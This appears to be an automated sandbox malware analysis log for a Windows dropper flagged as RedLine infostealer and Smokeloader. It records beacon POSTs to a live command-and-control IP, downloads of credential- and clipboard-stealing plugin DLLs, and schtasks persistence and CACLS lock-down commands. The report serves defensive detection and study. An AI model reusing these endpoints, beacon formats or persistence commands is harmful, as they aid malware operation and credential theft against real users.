                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 Feb 2023 20:31:09 GMTContent-Type: application/octet-streamContent-Length: 91136Last-Modified: Fri, 03 Feb 2023 17:19:21 GMTConnection: keep-aliveETag: "63dd4219-16400"Accept-Ranges: bytes
                            Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                            Source: Joe Sandbox ViewIP Address: 62.204.41.4 62.204.41.4
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 00000010.00000002.785793369.00000000010FA000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dll
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dllG
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php.
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php2
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php342a2
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpFo
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpIo
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpL
                            Source: mnolyk.exe, 00000010.00000003.741852374.0000000001197000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpc
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpe
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpe5342a2
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpm0
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exe
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exel
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpt
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phptch
                            Source: mnolyk.exe, 00000010.00000002.785793369.00000000010FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpyux
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Golol478Ns/index.php
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011D7F00 CreateMutexW,GetLastError,SetCurrentDirectoryA,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,15_2_011D7F00
                            Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 Feb 2023 20:31:09 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: xriv.exe, 0000000F.00000002.402972020.0000000000D3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                            System Summary

                            Source: 2.2.amMl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.2.amMl.exe.5b0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.2.amMl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.3.amMl.exe.5e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000002.00000002.367095576.0000000000767000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                            Source: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                            Source: 00000002.00000003.343232585.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dll B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                            Source: file.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 2.2.amMl.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.2.amMl.exe.5b0e67.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.2.amMl.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.3.amMl.exe.5e0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000002.00000002.367095576.0000000000767000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                            Source: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                            Source: 00000002.00000003.343232585.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_011D1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_011D1F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe, Code function: 1_2_00F81F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00F81F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Code function: String function: 0040E1D8 appears 44 times
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Code function: String function: 005BE43F appears 44 times
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Code function: String function: 011E7CE0 appears 35 times
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Code function: String function: 011E5E20 appears 130 times
                            Source: file.exe, Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 425676 bytes, 2 files, at 0x2c +A "bmMg.exe" +A "xriv.exe", ID 1580, number 1, 20 datablocks, 0x1503 compression
                            Source: bmMg.exe.0.dr, Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 234410 bytes, 2 files, at 0x2c +A "amMl.exe" +A "nika.exe", ID 1546, number 1, 12 datablocks, 0x1503 compression
                            Source: file.exe, 00000000.00000003.261384983.0000000004B55000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                            Source: file.exe, Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                            Source: file.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\amMl.exe.log
                            Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@37/14@0/1
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, File read: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_011D597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_011D597D
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Code function: 2_2_0239A1A8 ChangeServiceConfigA,2_2_0239A1A8
                            Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_011D4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_011D4FE0
                            Source: file.exe, ReversingLabs: Detection: 66%
                            Source: C:\Users\user\Desktop\file.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: unknown, Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                            Source: C:\Users\user\Desktop\file.exe, Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe, Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe
                            Source: unknown, Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Source: unknown, Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe, Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                            Source: C:\Users\user\Desktop\file.exe, Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                            Source: unknown, Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                            Source: unknown, Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: unknown, Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: unknown, Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                            Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4552:120:WilError_01
                            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_01
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                            Source: C:\Users\user\Desktop\file.exe, Command line argument: Kernel32.dll, 0_2_011D2BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe, Command line argument: Kernel32.dll, 1_2_00F82BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Command line argument: 08A, 2_2_00413780
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll
                            Source: file.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: file.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
